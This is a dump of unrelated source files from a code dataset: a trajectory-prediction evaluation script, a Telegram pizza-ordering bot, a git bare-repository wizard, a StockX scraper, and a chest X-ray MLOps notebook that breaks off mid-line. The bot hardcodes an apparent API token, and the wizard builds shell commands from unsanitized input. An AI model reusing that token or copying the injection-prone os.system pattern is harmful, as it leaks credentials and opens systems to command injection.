e:\n print(e)\n continue\n print('Evaluating: {} {} {}'.format(\n method_name, train_dataset, test_dataset, dataset_split))\n save_path = os.path.join(\n ut.RESULTS_ROOT,\n method_name,\n test_dataset,\n dataset_split,\n predictor.save_name + '.csv'\n )\n print('saving to {}'.format(save_path))\n if is_skip_if_exists and os.path.exists(save_path):\n print(': file exists -> skipping')\n continue\n results_df = evaluate(predictor, test_dataset, dataset_split,\n dataset2gt_name,\n is_display=is_display, is_test_on_all=is_test_on_all)\n\n print(save_path)\n ut.mkdir_p(os.path.dirname(save_path))\n results_df.to_csv(save_path, index=False, sep=' ')\n\n\ndef evaluate(predictor, test_dataset, dataset_split, dataset2gt_name,\n is_display=False, is_test_on_all=False):\n from metrics import evaluate_expected_distance_xy, evaluate_min_distance_xy\n\n gt_name = dataset2gt_name[test_dataset]\n if is_test_on_all:\n batches_df_path = os.path.join(ut.DATASETS_ROOT, 'split_1.0_0', 'batches', gt_name + '.csv')\n else:\n batches_df_path = os.path.join(ut.DATASETS_ROOT, dataset_split, 'batches', gt_name + '.csv')\n n_obs = predictor.n_obs\n n_preds = predictor.n_preds\n scale = 1.\n\n # --\n if is_display:\n from display import display_xy_predictions_vs_gt\n import matplotlib\n matplotlib.use('TkAgg')\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots()\n ax = fig.gca()\n plt.grid(True)\n t2pred_xyp = {i: [] for i in range(n_preds)}\n t2gt_xy_list = {i: [] for i in range(n_preds)}\n is_gt_linear_list = []\n cdf_bin_edges = np.arange(0, 20., .05)\n t2cdf_bin_counts = {i: np.zeros((cdf_bin_edges.size-1,), dtype=np.int) for i in range(n_preds)}\n distance_quantiles = np.arange(0.01, 1., .01)\n t2distance_quantile_values = {i: np.zeros((distance_quantiles.size,), dtype=np.float) for i in range(n_preds)}\n batches_df = pd.read_csv(batches_df_path, sep=' ', header=0) # dc.load_dataframe(batches_df_path)\n batches_df = batches_df[batches_df['agent_type'] != 1] # no vehicles\n batches_inds = np.unique(np.sort(batches_df['batch_ind']))\n skip = get_skip(batches_df[batches_df['batch_ind'] == batches_inds[0]])\n max_obs = 8\n time_elapsed = 0\n n_peds_evaluated = 0\n for batch_ind in batches_inds:\n batch_df = batches_df[batches_df['batch_ind'] == batch_ind]\n t = int(batch_df['t'].min())\n t_obs0 = t+(max_obs-n_obs)*skip\n t_pred0 = t+max_obs*skip\n t_end = t+(max_obs+n_preds)*skip\n # evaluated agents must be present in every frame\n obs_df = batch_df[batch_df['t'].isin(range(t_obs0, t_pred0))]\n evaluate_ids, evaluate_inds = get_eval_agents(batch_df, obs_df, 16, t_end)\n if len(evaluate_ids) == 0:\n # print(batch_ind)\n continue\n\n predictor_input = predictor.batch_df2input_fcn(obs_df, evaluate_ids)\n start_time = time.time()\n y_raw_pred = predictor.predict(*predictor_input)\n time_elapsed += time.time() - start_time\n y_pred_df = predictor.raw_pred2pred(y_raw_pred, evaluate_ids, evaluate_inds)\n\n print(batch_ind, len(evaluate_ids))\n if is_display:\n print(batch_ind)\n title_str = 'batch {}: '.format(batch_ind) + 't = {}, agent = {}'\n display_xy_predictions_vs_gt(\n ax, batch_df, y_pred_df, max_obs, evaluate_ids,\n pause=0.5, max_step=8, title_str=title_str,\n xlim=[-10, 20], ylim=[-10, 20])\n\n n_peds_evaluated += len(evaluate_ids)\n for j in range(len(evaluate_ids)):\n for i in range(n_preds):\n t_ind = t_pred0 + i*skip if 'Simulator' in predictor.save_name else i\n t2pred_xyp[i].append(\n y_pred_df[(y_pred_df['t'] == t_ind) &\n (y_pred_df['agent_id'] == evaluate_ids[j])][['x', 'y', 'p']].values\n )\n gt_t_df = batch_df[(batch_df['t'] == t_pred0 + i*skip) &\n (batch_df['agent_id'] == evaluate_ids[j])]\n # assert gt_t_df.shape[0] > 0\n t2gt_xy_list[i].append(gt_t_df[['x', 'y']].values)\n # distance cdf\n distances = np.sqrt(((t2pred_xyp[i][-1][:, :2] - t2gt_xy_list[i][-1])**2).sum(axis=1))\n t2cdf_bin_counts[i] += np.histogram(distances, bins=cdf_bin_edges)[0]\n assert distances.max() < cdf_bin_edges[-1]\n # distance quantiles\n t2distance_quantile_values[i] += np.percentile(distances, distance_quantiles*100, interpolation='lower')\n\n obs_df_j = batch_df[(batch_df['t'].isin(range(t_obs0, t_pred0))) & (batch_df['agent_id'] == evaluate_ids[j])]\n gt_df_j = batch_df[(batch_df['t'].isin(range(t_pred0, t_end))) & (batch_df['agent_id'] == evaluate_ids[j])]\n is_gt_linear_list.append(is_trajectory_linear(obs_df_j, gt_df_j, n_preds))\n # wdist(t) = ADE(t)\n eval_metrics = {name: [] for name in [\n 'wdist', 'Min_dist_0.01', 'wdist_linear', 'wdist_nonlinear',\n 'Min_dist_0.01_linear', 'Min_dist_0.01_nonlinear', 'dist_cdf',\n 'dist_quantile'\n ]}\n for i in range(n_preds):\n print('\\nTime t={} stats'.format(i+1))\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy\n in zip(t2pred_xyp[i], t2gt_xy_list[i])])\n wdist = wdist[~np.isnan(wdist)]/scale\n print('wdist {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist'].append(np.mean(wdist))\n\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy\n in zip(t2pred_xyp[i], t2gt_xy_list[i])])\n wdist = wdist[~np.isnan(wdist)]/scale\n print('min dist_0.01 {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01'].append(np.mean(wdist))\n\n # avg-linear/nonlinear\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('wdist_linear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist_linear'].append(np.mean(wdist))\n wdist = np.array([evaluate_expected_distance_xy(pred_xy, gt_xy)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if ~is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('wdist_nonlinear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['wdist_nonlinear'].append(np.mean(wdist))\n\n # min-linear/nonlinear\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('min dist_0.01_linear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01_linear'].append(np.mean(wdist))\n wdist = np.array([evaluate_min_distance_xy(\n pred_xy, gt_xy, 0)\n for pred_xy, gt_xy, is_linear\n in zip(t2pred_xyp[i], t2gt_xy_list[i], is_gt_linear_list) if ~is_linear])\n wdist = wdist[~np.isnan(wdist)] / scale\n print('min dist_0.01_nonlinear {:.2f}'.format(np.mean(wdist)))\n eval_metrics['Min_dist_0.01_nonlinear'].append(np.mean(wdist))\n\n # distance cdf\n eval_metrics['dist_cdf'].append(np.array2string(t2cdf_bin_counts[i], threshold=10000000))\n print(len(np.array2string(t2cdf_bin_counts[i])), 'dist cdf length')\n\n # dist_quantile plot\n t2distance_quantile_values[i] /= float(n_peds_evaluated)\n eval_metrics['dist_quantile'].append(np.array2string(t2distance_quantile_values[i], threshold=10000000))\n\n n_steps_predicted = len(batches_inds) * n_preds\n average_prediction_time = time_elapsed / n_steps_predicted\n print('Average prediction time {:.8f}s'.format(average_prediction_time))\n eval_metrics['Time'] = [average_prediction_time] * len(eval_metrics[list(eval_metrics.keys())[0]])\n\n eval_df = pd.DataFrame.from_dict(eval_metrics)\n pd.set_option('display.max_colwidth', -1)\n return eval_df\n\n\ndef get_skip(batch_df):\n \"\"\"\n\n :param batch_df: \n :return: skip: 1 = no skip, 2 = every other frame skipped\n :rtype int\n \"\"\"\n t_inds = np.unique(np.sort(batch_df['t'].values))\n return int(t_inds[1] - t_inds[0])\n\n\ndef get_eval_agents(df, obs_df, n_frames, t_max):\n # only eval on agents present in all n_frames of observations+pred\n # - for indexing, based on obs_df\n agent_ids = np.sort(obs_df['agent_id'].unique())\n evaluate_ids = []\n evaluate_inds = []\n for i, agent_id in enumerate(agent_ids):\n n_present = df[(df['agent_id'] == agent_id) &\n (df['t'] < t_max)].shape[0]\n if n_frames == n_present:\n evaluate_ids.append(agent_id)\n evaluate_inds.append(i)\n return evaluate_ids, evaluate_inds\n\n\ndef is_trajectory_linear(obs_df, gt_df, n_preds):\n xy = obs_df[['x', 'y']].values\n xp = np.mean(xy[1:, 0] - xy[:-1, 0]) * np.arange(1, n_preds + 1) + xy[-1, 0]\n yp = np.mean(xy[1:, 1] - xy[:-1, 1]) * np.arange(1, n_preds + 1) + xy[-1, 1]\n pred_xy = np.array([xp, yp]).T\n diff = (pred_xy - gt_df[['x', 'y']].values)**2\n rmse = np.sqrt(np.sum(diff)/n_preds) # in meters\n return rmse < 0.5\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"evaluate_split.py","file_name":"evaluate_split.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"52372433","text":"import telebot\r\nimport json\r\nfrom telebot import types\r\n\r\nsavatx = {}\r\nsavat1 = []\r\nc = {}\r\nbot = telebot.TeleBot(\"1340272262:AAH3XgBU08irFeU5t5529P3YMb-QIHhEhG0\")\r\n\r\n\r\ndef ruscha_otvet(message):\r\n bot.reply_to(message, \"ВЫ ВЫБИРАЛИ РУССКОГО ЯЗЫКА! 🇷🇺\")\r\n\r\n\r\ndef rus_knopkalari(message):\r\n rus_knopkalari = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\r\n knopka1 = types.KeyboardButton(\"Заказать 🥡\")\r\n knopka2 = types.KeyboardButton(\"Параметры ⚙️\")\r\n knopka3 = types.KeyboardButton(\"Оставить комментарий 📝\")\r\n knopka4 = types.KeyboardButton(\"Назад ◀️\")\r\n rus_knopkalari.add(knopka1, knopka2, knopka3, knopka4)\r\n bot.send_message(message.from_user.id, \"ВЫБЕРИТЕ ОДНУ ИЗ КАТЕГОРИЙ!\", reply_markup=rus_knopkalari)\r\n\r\n\r\ndef pizzi(message):\r\n print(message)\r\n pizza_knopka = types.ReplyKeyboardMarkup(row_width=3, resize_keyboard=True)\r\n pizza_1 = types.KeyboardButton(\"КОМБО ПИЦЦА 🏵\")\r\n pizza_2 = types.KeyboardButton(\"ПИЦЦА ШАШЛЫК ️🍢\")\r\n pizza_3 = types.KeyboardButton(\"КУРИННАЯ БАРБЕКЮ 🐥\")\r\n pizza_4 = types.KeyboardButton(\"НАЗАД 🔙\")\r\n pizza_5 = types.KeyboardButton(\"ПОСМОТРЕТЬ КОРЗИНУ 🗑\")\r\n pizza_knopka.add(pizza_1, pizza_2, pizza_3, pizza_4, pizza_5)\r\n bot.send_message(message.from_user.id, \"ПИЦЦА ЖДУТ ВАС! ☺☺️☺️☺️\", reply_markup=pizza_knopka)\r\n\r\ndef soni_rus(message):\r\n nomeri_rus = types.InlineKeyboardMarkup(row_width=3)\r\n nomer_1 = types.InlineKeyboardButton(text=\"1\", callback_data=\"odin\")\r\n nomer_2 = types.InlineKeyboardButton(text=\"2\", callback_data=\"dva\")\r\n nomer_3 = types.InlineKeyboardButton(text=\"3\", callback_data=\"tri\")\r\n nomer_4 = types.InlineKeyboardButton(text=\"4\", callback_data=\"chetiri\")\r\n nomer_5 = types.InlineKeyboardButton(text=\"5\", callback_data=\"pyat\")\r\n nomer_6 = types.InlineKeyboardButton(text=\"6\", callback_data=\"shest\")\r\n nomer_7 = types.InlineKeyboardButton(text=\"7\", callback_data=\"sem\")\r\n nomer_8 = types.InlineKeyboardButton(text=\"8\", callback_data=\"vosem\")\r\n nomer_9 = types.InlineKeyboardButton(text=\"9\", callback_data=\"devet\")\r\n nomeri_rus.add(nomer_1, nomer_2, nomer_3, nomer_4, nomer_5, nomer_6, nomer_7, nomer_8, nomer_9)\r\n bot.send_message(message.from_user.id, text=\"ВЫБЕРИТЕ КОЛИЧЕСТВУ!\", reply_markup=nomeri_rus)\r\n\r\ndef parametri(message):\r\n db = get_db()\r\n if db:\r\n for user in db:\r\n try:\r\n if user['user_id'] == message.from_user.id:\r\n ID = user['user_id']\r\n ISMI = user['first_name']\r\n NOMERI = user['tel_number']\r\n # QUESTION=str(ISMI)+str(ID)+str(NOMERI)\r\n INFO = \"ВАШЕ ИМЯ: \" + str(ISMI) + '\\n' + \"ВАШ ID: \" + str(\r\n ID) + '\\n' + \"ВАШ НОМЕР: \" + str(NOMERI)\r\n print(ID, ISMI, NOMERI)\r\n bot.send_message(message.from_user.id, INFO)\r\n except KeyError:\r\n return None\r\n\r\n\r\ndef get_db():\r\n with open('data.json', 'r') as f:\r\n return json.load(f)\r\n\r\n\r\ndef get_user_from_db(user_id):\r\n db = get_db()\r\n if db:\r\n for user in db:\r\n try:\r\n if user['user_id'] == user_id:\r\n return user_id\r\n except KeyError:\r\n return None\r\n return None\r\n\r\n\r\ndef set_user_to_db(user_id, first_name, tel_number):\r\n db = get_db()\r\n data = {'user_id': user_id, 'first_name': first_name, 'tel_number': tel_number}\r\n db.append(data)\r\n with open('data.json', 'w+') as f:\r\n json.dump(db, f)\r\n","sub_path":"RUSSIAN.py","file_name":"RUSSIAN.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24106519","text":"#!/usr/bin/env python\n# William Wu, 2013-06-26\nimport os, sys, datetime, getopt, subprocess\n\n# parameters\nauthor_name = \"William Wu\"\ntime_fmt = \"%Y-%m-%d %H:%M\"\n\n# usage\ndef usage():\n print('Usage:\\n\\t%s' % sys.argv[0])\n print('Synopsis:')\n print('\\tGenerates bare git repository with e-mail hooks enabled.')\n\n# main method\ndef main(argv):\n \n # defaults\n prompts_flag = True\n directory_name = \"project.git\"\n project_description = \"project\"\n email_addresses = [\"foobar@baz.com\"]\n \n # command-line argument parsing\n try:\n opts, args = getopt.gnu_getopt(argv, \"fh\", [\"fast\",\"help\"])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-f\", \"--fast\"):\n prompts_flag = False\n \n # gather parameters from user\n if prompts_flag: \n directory_name = raw_input(\"Enter directory name: \").strip()\n project_description = raw_input(\"Enter project description: \").strip()\n email_addresses = raw_input(\"Enter e-mail addresses of developers, separated by spaces: \").split()\n\n # construct git repository\n os.system(\"mkdir %s\" % directory_name)\n os.chdir(directory_name)\n process = subprocess.Popen(['git', 'init', '--bare'], shell=False, stdout=subprocess.PIPE)\n process.communicate()\n os.system(\"git config hooks.mailinglist \\\"%s\\\"\" % (\", \".join(email_addresses)) )\n os.system(\"git config hooks.emailprefix \\\"[git] \\\"\")\n os.system(\"echo '(%s) ' > description\" % project_description )\n os.chdir(\"hooks\")\n os.system(\"sed -e \\\"s/#\\. /. /g\\\" post-receive.sample > post-receive\")\n os.system(\"chmod 775 post-receive\")\n\n\n# invoke main\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"git-bare-wizard.py","file_name":"git-bare-wizard.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322117741","text":"import requests\nfrom bs4 import BeautifulSoup\n\nclass Item:\n def __init__(self, link):\n self.soup = BeautifulSoup(requests.get(link).text,\n features=\"html.parser\")\n self.name = self.soup.find('h1', {'class' : 'name'}).text\n self.sale = self.soup.find('div',{'class' : 'sale-value'}).text\n self.sale_size = self.soup.find('div', {'class' : 'last-sale-block'}\n ).find('div',\n {'class' : 'size-container'}).text\n self.sale_full = self.soup.find('div',{'class' : 'last-sale'}).text\n self.low = self.soup.find('div', {'class' : 'bid bid-button-b'}).find(\n 'div', {'class' : 'stat-value stat-small'}).text\n self.low_size = self.soup.find('div', {'class' : 'bid bid-button-b'}\n ).find('div',\n {'class' : 'size-container'}).text\n self.high = self.soup.find('div', {'class' : 'ask ask-button-b'}).find(\n 'div', {'class' : 'stat-value stat-small'}).text\n self.high_size = self.soup.find('div', {'class' : 'ask ask-button-b'}\n ).find('div',\n {'class' : 'size-container'}).text\n\n\n\nif __name__ == '__main__':\n\titem1 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-static')\n\titem2 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-cream-white')\n\titem3 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-white-core-black-red')\n\titem4 = Item('https://stockx.com/adidas-yeezy-boost-350-v2-beluga-2-0')\n\titems = [item1, item2, item3, item4]\n\n\tfor x in items:\n\t print(x.name)\n\t print(\"Last Sale: \" + x.sale + \", for a \" + x.sale_size)\n\t #print(item1.sale_full)\n\t print(\"Lowest Ask: \" + x.low + \", for a \" + x.low_size)\n\t print(\"Highest Bid: \" + x.high + \", for a \" + x.high_size + \"\\n\")\n\n\n\n\n\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471390155","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Tutorial MLOps\n# MAGIC \n# MAGIC This is a redefined notebook made available on a webinar hosted by Databricks, going through the whole pipeline of MLOps using delta lakes and model serving. You can watch the webinar [here](https://databricks.com/p/thank-you/webinar-operationalizing-machine-learning-at-scale-140431) (approx. 1h40m - this notebook demo starts after approx. 30 minutes). \n# MAGIC \n# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials work on this particular Databricks Shard_.\n# MAGIC \n# MAGIC **Note**: The steps for uploading data on the Databricks Shard can be found in the end of this notebook. The steps below starts from a point where the data is already uploaded to the Databricks Shard.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # From X-rays to a Production Classifier with MLflow\n# MAGIC \n# MAGIC This simple example will demonstrate how to build a chest X-Ray classifer with PyTorch Lightning, and explain its output, but more importantly, will demonstrate how to manage the model's deployment to production as a REST service with MLflow and its Model Registry.\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC The National Institute of Health (NIH) [released a dataset](https://www.nih.gov/news-events/news-releases/nih-clinical-center-provides-one-largest-publicly-available-chest-x-ray-datasets-scientific-community) of 45,000 chest X-rays of patients who may suffer from some problem in the chest cavity, along with several of 14 possible diagnoses. This was accompanied by a [paper](https://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) analyzing the data set and presenting a classification model.\n# MAGIC \n# MAGIC The task here is to train a classifier that learns to predict these diagnoses. Note that each image may have 0 or several 'labels'. This data set was the subject of a [Kaggle competition](https://www.kaggle.com/nih-chest-xrays/data) as well.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Data Engineering\n# MAGIC \n# MAGIC The image data is provided as a series of [compressed archives](https://nihcc.app.box.com/v/ChestXray-NIHCC). However they are also available [from Kaggle](https://www.kaggle.com/nih-chest-xrays/data) with other useful information, like labels and bounding boxes. In this problem, only the images will be used, unpacked into an `.../images/` directory,, and the CSV file of label information `Data_Entry_2017.csv` at a `.../metadata/` path.\n# MAGIC \n# MAGIC The images can be read directly and browsed with Apache Spark:\n\n# COMMAND ----------\n\nraw_image_df = spark.read.format(\"image\").load(\"dbfs:/datasets/ScaDaMaLe/nih-chest-xrays/images/raw/\") # This is the path where the xray images has been uploaded into dbfs.\ndisplay(raw_image_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### Managing Unstructured Data with Delta Lake\n# MAGIC \n# MAGIC Although the images can be read directly as files, it will be useful to manage the data as a [Delta](https://delta.io/) table:\n# MAGIC \n# MAGIC - Delta provides transactional updates, so that the data set can be updated, and still read safely while being updated\n# MAGIC - Delta provides [\"time travel\"](https://docs.delta.io/latest/quick-start.html#read-older-versions-of-data-using-time-travel) to view previous states of the data set\n# MAGIC - Reading batches of image data is more efficient from Delta than from many small files\n# MAGIC - The image data needs some one-time preprocessing beforehand anyway\n# MAGIC \n# MAGIC In this case, the images are all 1024 x 1024 grayscale images, though some arrive as 4-channel RGBA. They are normalized to 224 x 224 single-channel image data:\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import BinaryType, StringType\nfrom PIL import Image\nimport numpy as np\n\ndef to_grayscale(data, channels):\n np_array = np.array(data, dtype=np.uint8)\n if channels == 1: # assume mode = 0\n grayscale = np_array.reshape((1024,1024))\n else: # channels == 4 and mode == 24\n reshaped = np_array.reshape((1024,1024,4))\n # Data is BGRA; ignore alpha and use ITU BT.709 luma conversion:\n grayscale = (0.0722 * reshaped[:,:,0] + 0.7152 * reshaped[:,:,1] + 0.2126 * reshaped[:,:,2]).astype(np.uint8)\n # Use PIL to resize to match DL model that it will feed\n resized = Image.frombytes('L', (1024,1024), grayscale).resize((224,224), resample=Image.LANCZOS)\n return np.asarray(resized, dtype=np.uint8).flatten().tobytes()\n\nto_grayscale_udf = udf(to_grayscale, BinaryType())\nto_filename_udf = udf(lambda f: f.split(\"/\")[-1], StringType())\n\nimage_df = raw_image_df.select(\n to_filename_udf(\"image.origin\").alias(\"origin\"),\n to_grayscale_udf(\"image.data\", \"image.nChannels\").alias(\"image\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The file of metadata links the image file name to its labels. These are parsed and joined, written to a Delta table, and registered in the metastore:\n\n# COMMAND ----------\n\nraw_metadata_df = spark.read.\\\n option(\"header\", True).option(\"inferSchema\", True).\\\n csv(\"dbfs:/datasets/ScaDaMaLe/nih-chest-xrays/metadata/\").\\\n select(\"Image Index\", \"Finding Labels\")\n\ndisplay(raw_metadata_df)\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import explode, split\nfrom pyspark.sql.types import BooleanType, StructType, StructField\n\ndistinct_findings = sorted([r[\"col\"] for r in raw_metadata_df.select(explode(split(\"Finding Labels\", r\"\\|\"))).distinct().collect() if r[\"col\"] != \"No Finding\"])\nencode_findings_schema = StructType([StructField(f.replace(\" \", \"_\"), BooleanType(), False) for f in distinct_findings])\n\ndef encode_finding(raw_findings):\n findings = raw_findings.split(\"|\")\n return [f in findings for f in distinct_findings]\n\nencode_finding_udf = udf(encode_finding, encode_findings_schema)\n\nmetadata_df = raw_metadata_df.withColumn(\"encoded_findings\", encode_finding_udf(\"Finding Labels\")).select(\"Image Index\", \"encoded_findings.*\")\n\ntable_path = \"/tmp/nih-chest-xrays/image_table/\"\nmetadata_df.join(image_df, metadata_df[\"Image Index\"] == image_df[\"origin\"]).drop(\"Image Index\", \"origin\").write.mode(\"overwrite\").format(\"delta\").save(table_path)\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS nih_xray;\n# MAGIC USE nih_xray;\n# MAGIC CREATE TABLE IF NOT EXISTS images USING DELTA LOCATION '/tmp/nih-chest-xrays/image_table/';\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we optimize the newly created table so that fetching data is more efficient.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC OPTIMIZE images;\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Modeling with PyTorch Lightning and MLflow\n# MAGIC \n# MAGIC [PyTorch](https://pytorch.org/) is of course one of the most popular tools for building deep learning models, and is well suited to build a convolutional neural net that works well as a multi-label classifier for these images. Below, other related tools like [`torchvision`](https://pytorch.org/docs/stable/torchvision/index.html) and [PyTorch Lightning](https://www.pytorchlightning.ai/) are used to simplify expressing and building the classifier.\n# MAGIC \n# MAGIC The data set isn't that large once preprocessed - about 2.2GB. For simplicity, the data will be loaded and manipulated with [`pandas`](https://pandas.pydata.org/) from the Delta table, and model trained on one GPU. It's also quite possible to scale to multiple GPUs, or scale across machines with Spark and [Horovod](https://github.com/horovod/horovod), but it won't be necessary to add that complexity in this example.\n\n# COMMAND ----------\n\nfrom sklearn.model_selection import train_test_split\n\ndf = spark.read.table(\"nih_xray.images\")\ndisplay(df)\n\n# COMMAND ----------\n\ntrain_pd, test_pd = train_test_split(df.toPandas(), test_size=0.1, random_state=42) # Need to increase spark.driver.maxResultSize to at least 8GB through pasting spark.driver.maxResultSize g in cluster Spark config\n\nfrac_positive = train_pd.drop(\"image\", axis=1).sum().sum() / train_pd.drop(\"image\", axis=1).size\ndisease_names = df.drop(\"image\").columns\nnum_classes = len(disease_names)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC `torchvision` provides utilities that make it simple to perform some model-specific transformation as part of the model. Here, a pre-trained network will be used which requires normalized 3-channel RGB data as PyTorch Tensors:\n\n# COMMAND ----------\n\nfrom torchvision import transforms\n\ntransforms = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Lambda(lambda image: image.convert('RGB')),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Define the `Dataset` and train/test `DataLoader`s for this data set in PyTorch:\n\n# COMMAND ----------\n\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\n\nclass XRayDataset(Dataset):\n def __init__(self, data_pd, transforms):\n self.data_pd = data_pd\n self.transforms = transforms\n \n def __len__(self):\n return len(self.data_pd)\n \n def __getitem__(self, idx):\n image = np.frombuffer(self.data_pd[\"image\"].iloc[idx], dtype=np.uint8).reshape((224,224))\n labels = self.data_pd.drop(\"image\", axis=1).iloc[idx].values.astype(np.float32)\n return self.transforms(image), labels\n\ntrain_loader = DataLoader(XRayDataset(train_pd, transforms), batch_size=64, num_workers=8, shuffle=True)\ntest_loader = DataLoader(XRayDataset(test_pd, transforms), batch_size=64, num_workers=8)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that [MLflow](https://mlflow.org/) natively supports [logging PyTorch models](https://mlflow.org/docs/latest/python_api/mlflow.pytorch.html#module-mlflow.pytorch) of course, but, can also automatically log the output of models defined with PyTorch Lightning:\n\n# COMMAND ----------\n\nimport mlflow.pytorch\n\nmlflow.pytorch.autolog()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Finally, the model is defined, and fit. For simple purposes here, the model itself is quite simple: it employs the pretrained [densenet121](https://pytorch.org/hub/pytorch_vision_densenet/) layers to do most of the work (layers which are not further trained here), and simply adds some dropout and a dense layer on top to perform the classification. No attempt is made here to tune the network's architecture or parameters further.\n# MAGIC \n# MAGIC For those new to PyTorch Lightning, it is still \"PyTorch\", but removes the need to write much of PyTorch's boilerplate code. Instead, a `LightningModule` class is implemented with key portions like model definition and fitting processes defined.\n# MAGIC \n# MAGIC _Note: This section should be run on a GPU. An NVIDIA T4 GPU is recommended, though any modern GPU should work. This code can also be easily changed to train on CPUs or TPUs._\n\n# COMMAND ----------\n\nimport torch\nfrom torch.optim import Adam\nfrom torch.nn import Dropout, Linear\nfrom torch.nn.functional import binary_cross_entropy_with_logits\nfrom sklearn.metrics import log_loss\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\nclass XRayNNLightning(pl.LightningModule):\n def __init__(self, learning_rate, pos_weights):\n super(XRayNNLightning, self).__init__()\n self.densenet = torch.hub.load('pytorch/vision:v0.6.0', 'densenet121', pretrained=True)\n for param in self.densenet.parameters():\n param.requires_grad = False\n self.dropout = Dropout(0.5)\n self.linear = Linear(1000, num_classes)\n # No sigmoid here; output logits\n self.learning_rate = learning_rate\n self.pos_weights = pos_weights\n\n def get_densenet():\n return self.densenet\n \n def forward(self, x):\n x = self.densenet(x)\n x = self.dropout(x)\n x = self.linear(x)\n return x\n\n def configure_optimizers(self):\n return Adam(self.parameters(), lr=self.learning_rate)\n\n def training_step(self, train_batch, batch_idx):\n x, y = train_batch\n output = self.forward(x)\n # Outputting logits above lets us use binary_cross_entropy_with_logits for efficiency, but also, allows the use of\n # pos_weight to express that positive labels should be given much more weight. \n # Note this was also proposed in the paper linked above.\n loss = binary_cross_entropy_with_logits(output, y, pos_weight=torch.tensor(self.pos_weights).to(self.device))\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, val_batch, batch_idx):\n x, y = val_batch\n output = self.forward(x)\n val_loss = binary_cross_entropy_with_logits(output, y, pos_weight=torch.tensor(self.pos_weights).to(self.device))\n self.log('val_loss', val_loss)\n\nmodel = XRayNNLightning(learning_rate=0.001, pos_weights=[[1.0 / frac_positive] * num_classes])\n\n# Let PyTorch handle learning rate, batch size tuning, as well as early stopping.\n# Change here to configure for CPUs or TPUs.\ntrainer = pl.Trainer(gpus=1, max_epochs=20, \n auto_scale_batch_size='binsearch',\n auto_lr_find=True,\n callbacks=[EarlyStopping(monitor='val_loss', patience=3, verbose=True)])\ntrainer.fit(model, train_loader, test_loader)\n\n# As of version MLFlow 1.13.1, the framework seems to have trouble saving the pytorch lightning module through mlflow.pytorch.autolog() even though it should according to the documentation.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC There seems to be a bug with MLFlow, not able to autolog model from Pytorch. Instead we save the trained model at a custom path instead, enabling us to load it in later stage.\n\n# COMMAND ----------\n\npath_to_model = \"/dbfs/tmp/xray\"\n\n# COMMAND ----------\n\nimport os.path, shutil\nfrom os import path\n\nif 